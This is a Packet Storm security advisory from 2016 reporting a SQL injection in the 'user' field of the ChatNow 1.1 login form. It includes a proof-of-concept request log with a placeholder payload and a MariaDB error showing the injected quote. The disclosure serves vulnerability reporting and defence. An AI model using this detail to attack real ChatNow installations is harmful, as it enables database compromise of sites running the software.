exploit the possibilities

ChatNow 1.1 SQL Injection

ChatNow 1.1 SQL Injection
Posted Nov 27, 2016
Authored by ZwX

ChatNow version 1.1 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 44b4a03c5e15d476f57a5e4ff1239ffc

ChatNow 1.1 SQL Injection

Change Mirror Download
=====================================================
[#] Exploit Title : ChatNow 1.1 - SQL Injection Web Vulnerability
[#] Date Discovered : 2016-11-17
[#] Affected Product(s): chatNow v1.1 - Content Management System
[#] Exploitation Technique: Remote
[#] Severity Level: High
[#] Tested OS : Windows 10
=====================================================


[#] Product & Service Introduction:
===================================
Chat Open Source desenvolvido com PHP e MySQL. Com suporte para envio de videos do Youtube e imagens. Construido com jQuery.

(Copy of the Vendor Homepage: http://chatnow.thiagosf.net/ )


[#] Technical Details & Description:
====================================
A remote sql injection web vulnerability has been discovered in the official chatNow v1.1 content management system.
The web vulnerability allows remote attackers to execute own malicious sql commands to compromise the application.

The sql injection vulnerability is located in input name `user` which is found in the connection form. Remote attackers are able
to execute own sql commands, the attack vector of the vulnerability is application-side and the request method to inject is POST.

Request Method(s):
[+] POST

Vulnerable Input (Name):
[+] user


[#] Proof of Concept (PoC):
===========================
The remote sql-injection web vulnerability can be exploited by remote attackers without privileged web-application user account and without user interaction.
For security demonstration or to reproduce the sql-injection web vulnerability follow the provided information and steps below to continue.

--- PoC Session Logs [POST]---
Status: 200 [OK]
Host: localhost/chatNow/
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/chatNow/chat/login.php
Cookie: PHPSESSID=3g7cs1mammh9p767oed1v187t0; __utma=32540652.120788788.1479381166.1479381166.1479381166.1; __utmb=32540652.5.10.1479381166; __utmc=32540652; __utmz=32540652.1479381166.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
-
POST Method: user=[SQL INJECTION HERE]id_room=14&captcha=5253

--- PoC Error Logs ---
SELECT * FROM chat_users WHERE user = "1"'" ORDER BY id DESC
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''" ORDER BY id DESC' at line 1


[#] Vulnerability Disclosure Timeline:
======================================
2016-11-17 : Discovery of the Vulnerability
2016-11-17 : Contact the Vendor (No Response)
2016-11-28 : Public Disclosure


[#] Disclaimer:
===============
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.


Domain: www.zwx.fr
Contact: msk4@live.fr
Social: twitter.com/XSSed.fr
Feeds: www.zwx.fr/feed/
Advisory: www.vulnerability-lab.com/show.php?user=ZwX
packetstormsecurity.com/files/author/12026/
cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/
iedb.ir/author-ZwX.html
0day.today/author/27461


Copyright (c) 2016 | ZwX - Security Researcher (Software & web application)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    15 Files
  • 2
    Jan 2nd
    15 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    1 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    24 Files
  • 8
    Jan 8th
    15 Files
  • 9
    Jan 9th
    16 Files
  • 10
    Jan 10th
    23 Files
  • 11
    Jan 11th
    17 Files
  • 12
    Jan 12th
    3 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    33 Files
  • 16
    Jan 16th
    23 Files
  • 17
    Jan 17th
    29 Files
  • 18
    Jan 18th
    15 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close